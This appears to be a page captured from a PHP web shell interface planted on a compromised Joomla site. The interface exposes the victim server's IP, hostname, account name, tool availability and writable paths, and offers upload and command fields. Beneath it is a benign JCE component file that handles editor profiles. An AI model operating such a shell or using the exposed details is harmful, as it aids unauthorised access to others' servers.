Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/www/administrator/components/com_jce/tables/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/www/administrator/components/com_jce/tables/profiles.php
<?php

/**
 * @copyright 	Copyright (c) 2009-2019 Ryan Demmer. All rights reserved
 * @license   	GNU/GPL 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
 * JCE is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses
 */
defined('JPATH_BASE') or die('RESTRICTED');

require_once dirname(dirname(__FILE__)).'/helpers/extension.php';
require_once dirname(dirname(__FILE__)).'/helpers/encrypt.php';

class WFTableProfiles extends JTable
{
    /*
     * Primary Key
     *
     *  @var int
     */
    public $id = null;

    /*
     *
     *
     * @var varchar
     */
    public $name = null;

    /*
     *
     *
     * @var varchar
     */
    public $description = null;

    /*
     *
     *
     * @var varchar
     */
    public $components = null;

    /*
     *
     *
     * @var int
     */
    public $area = null;

    /*
     *
     *
     * @var varchar
     */
    public $device = null;

    /*
     *
     *
     * @var varchar
     */
    public $users = null;

    /*
     *
     *
     * @var varchar
     */
    public $types = null;

    /*
     *
     *
     * @var varchar
     */
    public $rows = null;

    /*
     *
     *
     * @var varchar
     */
    public $plugins = null;

    /*
     *
     *
     * @var tinyint
     */
    public $published = 0;

    /*
     *
     *
     * @var tinyint
     */
    public $ordering = 1;

    /*
     *
     *
     * @var int unsigned
     */
    public $checked_out = 0;

    /*
     *
     *
     * @var datetime
     */
    public $checked_out_time = '';

    /*
     *
     *
     * @var text
     */
    public $params = null;

    public function __construct(&$db)
    {
        parent::__construct('#__wf_profiles', 'id', $db);
    }

    /**
     * Overridden JTable::load to decrypt parameters.
     *
     * @param int  $id    An optional profile id
     * @param bool $reset False if row not found or on error
     *                    (internal error state set in that case)
     *
     * @return bool True on success, false on failure
     *
     * @since   2.4
     */
    public function load($id = null, $reset = true)
    {
        $return = parent::load($id, $reset);

        if ($return !== false && !empty($this->params)) {
            $this->params = WFEncryptHelper::decrypt($this->params);
        }

        return $return;
    }

    /**
     * Overridden JTable::store to encrypt parameters.
     *
     * @param bool $updateNulls True to update fields even if they are null
     *
     * @return bool True on success
     *
     * @since   2.4
     */
    public function store($updateNulls = false)
    {
        if ($this->id && $this->params) {
            $component = WFExtensionHelper::getComponent();

            // get params definitions
            $params = new WFParameter($component->params, '', 'preferences');

            if ($params->get('secureparams', 0)) {
                $this->params = WFEncryptHelper::encrypt($this->params);
            }
        }

        return parent::store($updateNulls);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit